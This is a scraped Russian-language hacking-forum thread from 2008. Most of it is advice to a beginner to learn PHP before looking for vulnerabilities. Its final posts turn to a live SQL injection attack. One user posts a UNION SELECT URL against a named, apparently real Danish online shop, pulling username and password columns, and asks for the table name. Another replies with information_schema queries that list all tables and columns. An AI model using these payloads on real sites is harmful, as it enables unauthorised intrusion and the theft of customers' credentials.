ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2011  
Старый 22.05.2008, 19:45
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408

Репутация: 861


По умолчанию

samarin, как ты можешь найти уязвимость в коде, не зная языка? учи язык и всё.
 
Ответить с цитированием

  #2012  
Старый 22.05.2008, 20:02
samarin
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283

Репутация: 69
Отправить сообщение для samarin с помощью ICQ
По умолчанию

Цитата:
Сообщение от n0ne  
samarin, как ты можешь найти уязвимость в коде, не зная языка? учи язык и всё.
ок. Но одним языком сыт не будешь. Нужно понять принцип нахождения уязвимостей. Ведь взять для примера людей, которые хорошо знают язык, пишут всякие cms, форумы и т.д. Но сами они, в большинстве, не могут находить уязвимости.
-------------------------------------------------------------
читать код можно не умея программировать.
-------------------------------------------------------------
Я очень быстро учусь чему-то(если хорошо подсказывают )). И мне важно понять принцип.
 
Ответить с цитированием

  #2013  
Старый 22.05.2008, 23:31
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Цитата:
читать код можно не умея программировать.
ну-ну. А ты умеешь говорить по испански, незная ниодного испанского слова?

Учи PHP для начала
 
Ответить с цитированием

  #2014  
Старый 23.05.2008, 01:26
samarin
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283

Репутация: 69
Отправить сообщение для samarin с помощью ICQ
По умолчанию

Spyder - разве я сказал, что не знаю пхп?
Я знаю пхп на уровне ... второго класса )) (могу ,более менее, читать код) - это как испанский со словарем ))
--------------------------------------------------------------
Цитата:
Учи PHP для начала
если это и есть ответ на мой вопрос, что ж буду грызть книги по php
 
Ответить с цитированием

  #2015  
Старый 23.05.2008, 01:31
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408

Репутация: 861


По умолчанию

samarin, просто ты не поймешь почему уязвимость именно тут, и почему это уязвимость и как оно вообще работает, не зная языка. А если просто показать пару шаблонов, то так и будешь "подставлять кавычку" )) Вообщем, надо учить язык, ты это уже и так понял и Spyder ещё сказал)
 
Ответить с цитированием

  #2016  
Старый 23.05.2008, 01:39
samarin
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283

Репутация: 69
Отправить сообщение для samarin с помощью ICQ
По умолчанию

n0ne - Да, спасибо! Как повышу свой уровень знаний пхп обязательно подниму тему еще раз.
------------------------
какие книги на ваш взгляд самые удачные, чтобы начать детальное(а главное правильное)изучение языка?
 
Ответить с цитированием

  #2017  
Старый 23.05.2008, 08:56
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408

Репутация: 861


По умолчанию

samarin, www.intuit.ru - там есть довольно неплохие курсы по php. А потом читай статьи и книги по безопасному программированию на php и была неплохая книженция "php глазами хакера", если не ошибаюсь.
 
Ответить с цитированием

  #2018  
Старый 23.05.2008, 09:18
Александр Логинов
Banned
Регистрация: 22.05.2008
Сообщений: 7
Провел на форуме:
23099

Репутация: -22
По умолчанию

samarin, подставляй ковычки в конце адресной строки пока не увидишь надпись MySQL Syntax Error
 
Ответить с цитированием

  #2019  
Старый 23.05.2008, 09:33
1SeTh
Участник форума
Регистрация: 17.02.2006
Сообщений: 189
Провел на форуме:
2406659

Репутация: 34
По умолчанию

никак не могу найти название таблицы

Цитата:
http://www.denarms.dk/netbutik.php?cat=-1+union+select+concat_ws(0x3a3a,brugernavn,adgangs kode)+from+???/*
 
Ответить с цитированием

  #2020  
Старый 23.05.2008, 09:38
Александр Логинов
Banned
Регистрация: 22.05.2008
Сообщений: 7
Провел на форуме:
23099

Репутация: -22
По умолчанию

Цитата:
Сообщение от 1SeTh  
никак не могу найти название таблицы
+union+select+table_name+from+information_schema.t ables/* - все названия таблиц
+union+select+column_name+from+information_schema. columns/* - все названия столбцов
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ